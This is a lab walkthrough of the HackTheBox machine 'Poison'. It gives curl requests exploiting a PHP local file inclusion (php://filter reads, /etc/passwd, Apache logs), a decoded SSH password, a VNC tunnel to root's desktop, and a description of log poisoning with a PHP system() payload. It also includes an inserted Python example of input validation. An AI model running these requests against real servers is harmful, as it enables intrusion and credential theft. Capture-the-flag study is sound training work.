Poison

From Luniwiki

Poison01.png

Port scan

u505@naos:~/HTB/Machines/Poison$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.84
Starting masscan 1.3.1 at 2021-01-29 15:22:16 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.84
Discovered open port 22/tcp on 10.10.10.84
u505@naos:~/HTB/Machines/Poison$ nmap -sC -sV poison
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 16:11 EST
Nmap scan report for poison (10.10.10.84)
Host is up (0.037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.27 seconds

Web enumeration

The first page shows a PHP form.

Poison02.png

We pass a script name in the form.

Poison03.png

It executes that script.

Poison05.png

The index page is a simple GET form, and the input is a filename.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb
<html>
 <body>
 <h1>Temporary website to test local .php scripts.</h1>
 Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php
 <br>
 </body>
 </html>
 <br>
 <form action="/browse.php" method="GET">
        Scriptname: <input type="text" name="file">
<input type="submit" value="Submit"> </form>

Reading the source of browse.php through the php://filter base64 wrapper shows that the page includes the requested file without any validation.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=php://filter/convert.base64-encode/resource=browse.php | base64 -d
<?php
include($_GET['file']);
?>
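The root cause is the unvalidated include() above. As an added illustration (not the box's code and not a PHP patch), here is the validation a hardened browse.php would need, written in Python so it can be run and tested locally. The document root is the one disclosed by the PHP warning later on the page, the allowlist is the four scripts the index page advertises, and the names DOCROOT, ALLOWED_SCRIPTS and resolve_include are this example's own.

```python
import os
from typing import Optional

# Document root disclosed by the PHP warning on this page.
DOCROOT = "/usr/local/www/apache24/data"
# The index page advertises exactly these scripts; anything else is rejected.
ALLOWED_SCRIPTS = frozenset({"ini.php", "info.php", "listfiles.php", "phpinfo.php"})


def resolve_include(requested: str, docroot: str = DOCROOT,
                    allowed: frozenset = ALLOWED_SCRIPTS) -> Optional[str]:
    """Return the absolute path a hardened browse.php may include, or None.

    Three independent checks, applied in order; each one alone already
    blocks the php://filter read, the /etc/passwd read and the log include
    shown on this page, and together they leave no single point of failure.
    """
    # 1. Stream wrappers (php://, data://, expect://, ...) are never file names.
    if "://" in requested:
        return None
    # 2. Only a bare file name from the allowlist is acceptable. Comparing
    #    against basename() rejects absolute paths, "../" sequences and
    #    subdirectories in one go.
    if os.path.basename(requested) != requested or requested not in allowed:
        return None
    # 3. Belt and braces: the resolved path must still sit under the docroot,
    #    so that a later, wider allowlist cannot reintroduce traversal.
    root = os.path.realpath(docroot)
    full = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([full, root]) != root:
        return None
    return full


if __name__ == "__main__":
    # Requests taken from this page: only the advertised script resolves.
    for req in ("listfiles.php", "/etc/passwd", "../../../../etc/passwd",
                "php://filter/convert.base64-encode/resource=browse.php",
                "/var/log/httpd-access.log", "browse.php"):
        print(f"{req!r:60} -> {resolve_include(req)}")
```

Note that browse.php itself is deliberately not on the allowlist: the index page never offers it, and allowing a script to include itself gains nothing.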

The script listfiles.php provides a list of the files in the web directory.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=listfiles.php
Array
(
    [0] => .
    [1] => ..
    [2] => browse.php
    [3] => index.php
    [4] => info.php
    [5] => ini.php
    [6] => listfiles.php
    [7] => phpinfo.php
    [8] => pwdbackup.txt
)

The content of pwdbackup.txt looks like base64, and the accompanying text suggests it is encoded several times.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=pwdbackup.txt
This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO Ukd4RVdub3dPVU5uUFQwSwo=

Decode password

u505@naos:~/HTB/Machines/Poison$ cat pwdbackup.txt | tail -n 16 > pwdbackup

This script base64-decodes the text in a loop, one layer per keypress.

u505@naos:~/HTB/Machines/Poison$ cat decode.sh
# Strip the line wrapping, then base64-decode one layer per keypress
encoded=$(cat pwdbackup | tr -d '\n')
i=0
while :
do
        i=$((i + 1))
        echo "--------------- Decode number $i -------------------"
        decoded=$(echo -n "$encoded" | base64 -d | tr -d '\n')
        echo "$decoded"
        # Wait for Enter so each layer can be inspected; Ctrl-C to stop
        read abc
        encoded=$decoded
done

Running it peels one base64 layer per round; after 13 rounds we have clear text.

u505@naos:~/HTB/Machines/Poison$ sh decode.sh
--------------- Decode number 1 -------------------
--------------- Decode number 2 -------------------
--------------- Decode number 3 ------------------- Vm0wd2QyVkZOVWRpUm1SWFYwZG9WbFl3WkRSV1ZsbDNXa1JTVjFKdGVGWlZNakExVmpKS1NHVkVRbUZXVmxsM1dWZDRTMk14WkhWaQpSbVJPWW14R00xWnRkRlpsUmxsNVZHdHNhUXBTYlZKd1ZtdGFZVlZXWkZkYVJGSmFWakF4TkZaSE5WZGhVWEJUWWxaS1ZWWkdVa3RpCk1rbDRWMjVLV2sweWFGUlpiRnBoWld4V2RFNVdaR2hSV0VKVVdXeGtiMlJzWkZkVmEzUnNDbUpXV2toV01qVkxXVlpLUjFOc1VsVlcKYkhBelZtcEdVMVl4V25OYVIyaFdWMFZLVlZadE1UQmtNa2w0V2toT1lWTkhVbE5EYlVZMlZteG9WbUpIYUhwV01qRlhaRWRXUjFOcwpaRmNLWWxVd2QxWkVSbGRVTWtwelVXeFdUbEpZVGt4RFp6MDlDZz09Cg==
--------------- Decode number 4 ------------------- Vm0wd2VFNUdiRmRXV0doVlYwZDRWVll3WkRSV1JteFZVMjA1VjJKSGVEQmFWVll3WVd4S2MxZHViRmROYmxGM1ZtdFZlRll5VGtsaQpSbVJwVmtaYVVWZFdaRFJaVjAxNFZHNVdhUXBTYlZKVVZGUktiMkl4V25KWk0yaFRZbFphZWxWdE5WZGhRWEJUWWxkb2RsZFdVa3RsCmJWWkhWMjVLWVZKR1NsUlVWbHAzVmpGU1YxWnNaR2hWV0VKVVZtMTBkMkl4WkhOYVNHUlNDbUY2VmxoVmJHaHpWMjFXZEdWR1NsZFcKYlUwd1ZERldUMkpzUWxWTlJYTkxDZz09Cg==
--------------- Decode number 5 ------------------- Vm0weE5GbFdWWGhVV0d4VVYwZDRWRmxVU205V2JHeDBaVVYwYWxKc1dubFdNblF3VmtVeFYyTkliRmRpVkZaUVdWZDRZV014VG5WaQpSbVJUVFRKb2IxWnJZM2hTYlZaelVtNVdhQXBTYldodldWUktlbVZHV25KYVJGSlRUVlp3VjFSV1ZsZGhVWEJUVm10d2IxZHNaSGRSCmF6VlhVbGhzV21WdGVGSldWbU0wVDFWT2JsQlVNRXNLCg==
--------------- Decode number 6 ------------------- Vm0xNFlWVXhUWGxUV0d4VFlUSm9WbGx0ZUV0alJsWnlWMnQwVkUxV2NIbFdiVFZQWVd4YWMxTnViRmRTTTJob1ZrY3hSbVZzUm5WaApSbWhvWVRKemVGWnJaRFJTTVZwV1RWVldhUXBTVmtwb1dsZHdRazVXUlhsWmVteFJWVmM0T1VOblBUMEsK
--------------- Decode number 7 ------------------- Vm14YVUxTXlTWGxTYTJoVllteEtjRlZyV2t0VE1WcHlWbTVPYWxac1NubFdSM2hoVkcxRmVsRnVhRmhoYTJzeFZrZDRSMVpWTVVWaQpSVkpoWldwQk5WRXlZemxRVVc4OUNnPT0K
--------------- Decode number 8 ------------------- VmxaU1MySXlSa2hVYmxKcFVrWktTMVpyVm5OalZsSnlWR3hhVG1FelFuaFhha2sxVkd4R1ZVMUViRVJhZWpBNVEyYzlQUW89Cg==
--------------- Decode number 9 ------------------- VlZSS2IyRkhUblJpUkZKS1ZrVnNjVlJyVGxaTmEzQnhXakk1VGxGVU1EbERaejA5Q2c9PQo=
--------------- Decode number 10 ------------------- VVRKb2FHTnRiRFJKVkVscVRrTlZNa3BxWjI5TlFUMDlDZz09Cg==
--------------- Decode number 11 ------------------- UTJoaGNtbDRJVElqTkNVMkpqZ29NQT09Cg==
--------------- Decode number 12 ------------------- Q2hhcml4ITIjNCU2JjgoMA==
--------------- Decode number 13 ------------------- Charix!2#4%6&8(0 ^C

User Flag

Take a look at system users.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=/etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh

The user charix with the decoded password works over SSH.

u505@naos:~/HTB/Machines/Poison$ ssh charix@poison
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.

"man firewall" will give advice for building a FreeBSD firewall
		-- David Scheidt <dscheidt@tumbolia.com>
charix@Poison:~ % whoami
charix
charix@Poison:~ % cat user.txt
<USER_FLAG>

Privilege escalation

In the user's home folder, there is a zip file.

charix@Poison:~ % ls -l
total 8
-rw-r-----  1 root  charix  166 Mar 19  2018 secret.zip
-rw-r-----  1 root  charix   33 Mar 19  2018 user.txt

Download the file with scp.

u505@naos:~/HTB/Machines/Poison$ scp charix@poison:/home/charix/secret.zip ./
Password for charix@Poison:
secret.zip                                    100%  166     4.2KB/s   00:00

The zip file is password protected; the password is the user's password.

u505@naos:~/HTB/Machines/Poison$ unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

The extracted file is 8 bytes of binary data.

u505@naos:~/HTB/Machines/Poison$ xxd secret
00000000: bda8 5b7c d596 7a21                      ..[|..z!

A VNC server (Xvnc) is running as root, with its password file at /root/.vnc/passwd.

charix@Poison:~ % ps -al
 UID PID PPID CPU PRI NI   VSZ  RSS MWCHAN STAT TT     TIME COMMAND
   0 529    1   0  20  0 23620 8872 select I    v0- 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -local
   0 540    1   0  36  0 67220 7064 select I    v0- 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
   0 541    1   0  26  0 37620 5312 select I    v0- 0:00.01 twm
   0 696    1   0  52  0 10484 2076 ttyin  Is+  v0  0:00.00 /usr/libexec/getty Pc ttyv0
   0 697    1   0  52  0 10484 2076 ttyin  Is+  v1  0:00.00 /usr/libexec/getty Pc ttyv1
   0 698    1   0  52  0 10484 2076 ttyin  Is+  v2  0:00.00 /usr/libexec/getty Pc ttyv2
   0 699    1   0  52  0 10484 2076 ttyin  Is+  v3  0:00.00 /usr/libexec/getty Pc ttyv3
   0 700    1   0  52  0 10484 2076 ttyin  Is+  v4  0:00.00 /usr/libexec/getty Pc ttyv4
   0 701    1   0  52  0 10484 2076 ttyin  Is+  v5  0:00.00 /usr/libexec/getty Pc ttyv5
   0 702    1   0  52  0 10484 2076 ttyin  Is+  v6  0:00.00 /usr/libexec/getty Pc ttyv6
   0 703    1   0  52  0 10484 2076 ttyin  Is+  v7  0:00.00 /usr/libexec/getty Pc ttyv7
   0 560  540   0  52  0 19660 3616 ttyin  Is+   0  0:00.01 -csh (csh)
1001 759  758   0  20  0 19660 3652 pause  Ss    1  0:00.02 -csh (csh)
1001 810  759   0  20  0 21208 2652 -      R+    1  0:00.00 ps -al

Netstat confirms that VNC is listening on localhost, port 5901.

root@Poison:~ # netstat -an | grep LISTEN
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

Open an SSH session forwarding local port 5901 to port 5901 on the target.

u505@naos:~/HTB/Machines/Poison$ ssh -L 5901:127.0.0.1:5901 charix@poison
Password for charix@Poison:
Last login: Thu Jan 28 22:49:01 2021 from 10.10.14.14
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.

In order to search for a string in some files, use 'grep' like this:

	grep "string" filename1 [filename2 filename3 ...]

This will print out the lines in the files that contain the string. grep can
also do a lot more advanced searches - type 'man grep' for details.

Check that our local port 5901 is forwarded to port 5901 on the remote machine: the RFB banner confirms a VNC server answers.

u505@naos:~/HTB/Machines/Poison$ telnet 127.0.0.1 5901
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
RFB 003.008
quit
sadasd
Connection closed by foreign host.

Open a VNC session from our box, using the secret file extracted earlier as the password file.

u505@naos:~/HTB/Machines/Poison$ export DISPLAY=:10.0
u505@naos:~/HTB/Machines/Poison$ vncviewer 127.0.0.1:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Poison04.png

Intended way

Finding pwdbackup.txt so quickly solves the machine, but I missed the point of the box. The intended way is to gain a reverse shell by poisoning the Apache log files. Once the reverse shell is obtained, the file pwdbackup.txt is read, and the machine is solved as previously explained.

Log file location

If we request a nonexistent file, the PHP warning discloses the document root folder.

u505@naos:~/HTB/Machines/Poison$ curl http://poison.htb/browse.php?file=u505

Warning: include(u505): failed to open stream: No such file or directory in /usr/local/www/apache24/data/browse.php on line 2

Warning: include(): Failed opening 'u505' for inclusion (include_path='.:/usr/local/www/apache24/data') in /usr/local/www/apache24/data/browse.php on line 2

After a few tries, we find the httpd.conf file at /usr/local/etc/apache24/httpd.conf.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=/usr/local/etc/apache24/httpd.conf | grep Log
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
ErrorLog "/var/log/httpd-error.log"
# LogLevel: Control the number of messages logged to the error_log.
LogLevel warn
    # a CustomLog directive (see below).
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    # The location and format of the access logfile (Common Logfile Format).
    #CustomLog "/var/log/httpd-access.log" common
    # (Combined Logfile Format) you can use the following directive.
    CustomLog "/var/log/httpd-access.log" combined

The access log is stored in /var/log/httpd-access.log and the combined format logs the User-Agent. We can read the log file through the include.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=/var/log/httpd-access.log

192.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.2 - - [31/Jan/2021:12:36:00 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:36:11 +0100] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 69953 "http://poison.htb/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:54:39 +0100] "GET / HTTP/1.1" 200 289 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:54:50 +0100] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:16 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:28 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:12:57 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 388 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:13:54 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=listfiles.php HTTP/1.1" 200 120 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:38:15 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:06 +0100] "GET /browse.php?dsadasasd HTTP/1.1" 200 321 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:25 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:41 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:42:27 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:09 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:17 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:48 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:52 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:22 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:44 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:02 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:21 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:53 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:02 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:20 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 3991 "-" "curl/7.74.0"

Log file poisoning

Tampering with the HTTP request lets us put PHP code in the User-Agent header; once the log file is included through browse.php, that code runs and calls system() on a cmd parameter.

Poison06.png

Now when we read the log file again, we see a warning: the PHP planted in the User-Agent ran when the log was included, and system() complained because the cmd parameter was empty.

u505@naos:~/HTB/Machines/Poison$ curl -s http://poison.htb/browse.php?file=/var/log/httpd-access.log

192.168.253.133 - - [24/Jan/2018:18:33:25 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.0" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "POST /sdk HTTP/1.1" 404 201 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.2 - - [31/Jan/2021:12:36:00 +0100] "GET / HTTP/1.1" 200 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:36:11 +0100] "GET /browse.php?file=phpinfo.php HTTP/1.1" 200 69953 "http://poison.htb/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:12:54:39 +0100] "GET / HTTP/1.1" 200 289 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:54:50 +0100] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:16 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:28 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:12:57 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 388 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:13:54 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=listfiles.php HTTP/1.1" 200 120 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:38:15 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
